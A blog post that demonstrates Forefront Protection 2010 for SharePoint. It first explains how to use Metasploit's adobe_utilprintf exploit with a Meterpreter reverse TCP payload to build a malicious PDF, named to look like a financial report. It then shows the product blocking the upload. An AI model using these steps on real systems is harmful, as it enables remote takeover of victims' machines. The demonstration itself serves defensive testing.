These days, many organizations are trying to take full advantages of SharePoint which draws out money in pockets of those organizations. Document Management system is indispensably one of the first things they would consider. One of the key components of a generic document management is security. Security factor in a document management system comes from many different things. One of them could be a consideration of internally sharing documents through the company. It also could be a prevention of document storage from threats from Internet. IT departments have been designing and planning practically security solutions that have the ability to protect documents both intranet and extranet.

From an intranet perspective, building a typical Active Directory model is worth considering. Active Directory Domain Services has been designed to facilitate users and computers management. Additionally, Active Directory helps enforce security policies, as well as easily  install critical patches or hotfixes for all client computers joined to AD environment. To protect client computers and servers, IT department has installed antivirus client and server applications. However, imagine if an end-user using a computer of his friend in extranet environment is going to upload an infected document he doesn’t know to a shared document library in SharePoint. What will happen after uploading? I don’t think your antivirus application installed in the SharePoint server can detect the infected document during uploading process. And then if the infected document is completely uploaded to SharePoint server, can the scanning engine installed in SQL server scan deeply to structured data of the infected document? That’s what you may come up.

Is there any tool that has the ability to provide a real-time scan and detect an infected document during uploading? My immediate answer is Forefront Protection 2010 for SharePoint.

As many of you have heard that Forefront Protection 2010 for SharePoint (FPSP) provides a powerful shield which has the ability to prevent end-users from uploading and downloading infected documents to SharePoint document libraries. It might be incredible when you get to know that FPSP combines multiple anti-malware scanning engines developed by big computer security companies, one of them is a green giant: Kaspersky.

 Engines that available in Forefront Protection 2010 for SharePoint

Any purpose of writing this post I would like to tell you?

Imagine you are working as SharePoint administrator in a financial service company. Your company has implemented document management system based on SharePoint 2010. Symantec software are installed in all client computers joined to corporate network. Once detecting malware in the computers, Symantec will automatically delete immediately. It sounds good?  One of these days, an accountant reported to the IT department that she lost password of a bank account. After an investigation, you have found out that the accountant used her personal computer at home to log in to web-based banking application. After downloading a financial document in SharePoint library to her computer, she opened the document and entered information from the financial document into web form in the bank’s website. After that, she lost password. You have read the capabilities of Forefront Protection 2010 for SharePoint and now you really want to propose a solution to your CFO who has never cared about threats or vulnerabilities from Internet she may get, because she thinks her computer has Symantec software which is updated the latest patch. However, when you ask the accountant for the financial document you think it is infected malware, she says she can’t find it. Hence, one of the things to do is try to create an infected document and then show a demonstration to your CFO how Forefront Protection 2010 for SharePoint prevents that infected document. So that’s what I would like to write in this post.

This post consists of two parts:

  • Create an infected document by Metasploit tool.
  • Show CFO how FPSP 2010 prevents the infected document.

Metasploit Framework (MSF) is one of the redoubtable security & hacking tools. It enables attackers to develop malware scripts in order to exploit IT systems through vulnerabilities. Metasploit is used broadly by security professionals as well as someone I would call “script kiddie.” To learn more about MSF, here you go:

In this section, I’m going to create and then inject a malware script to a *.pdf file. When an end-user opens this file, a malware script is executed, establishing a connection from attacker’s computer to the computer of the end-user immediately. To build a test environment, make sure you have Backtrack 5 R2 installed in virtual machine (or physical computer).

Open MSF and type #msconsole

Type the following code to create a *.pdf file including malware scripts utilizing the vulnerability ‘util.print()’ JavaScript Function Stack injecting to Adobe Reader.

I use the command use exploit/windows/fileformat/adobe_utilprintf as an exploitability of vulnerability ‘util.printf()’. Assuming the Adobe Reader installed in the client computer is version 9. I have seen many organizations have not upgraded to the latest Adobe Reader build so this may be a gap opened for attackers. The command set FILENAME Financial Analysis Quater 4.pdf is used to name infected document. The command set PAYLOAD windows/meterpreter/reverse_tcp will automatically open a TCP connection to the attacker’s computer for the next executions. In this case, when Financial Analysis Quater 4.pdf document is opened, a TCP connection from the attacker’s computer to victim is immediately established. After that, I set the IP address of the attacker’s computer and port which is responsible for listening to the TCP connection established from victim’s computer.

Note:  use show options to review all settings and parameters.

The next step is to execute an exploitability, use this command /pentest/exploits/framework3/data/exploits/. And then use the following command to establish a listening channel in the attacker’s computer to get data connection from victim’s computer.

Next, I will install Forefront Protection 2010 for SharePoint.

Download Forefront Protection 2010 for SharePoint here

Check out Forefront Protection 2010 for SharePoint requirement

The steps of FPSP installation are easy. Make sure your account has right permissions and SQL server roles as the instruction during installation. The following image illustrates my logical topology. Forefront Protection 2010 for SharePoint is installed in the Web-front end server in my SharePoint environment. I also include some small figures in the image.

I have created a site collection using Team Site template for the demonstration. Shared Document library is used by default. Let me upload the infected document I have created and then see how it goes. The image below shows you the result of the failed uploading, it’s because Forefront Protection 2010 for SharePoint detects the infected document and prevented it.

As a SharePoint administrator, you do need to know what happens when you have seen such an image. Open Forefront Protection 2010 for SharePoint administration interface. Under Server Security Views, click Incidents and check the Detection Details tab.

Looks good?

In order to show you simple scenario on how Forefront Protection 2010 for SharePoint detects and prevents users from uploading, I created an infected document and tried to upload to SharePoint document library. However, the uploading is failed thanks to Forefront Protection 2010 for SharePoint.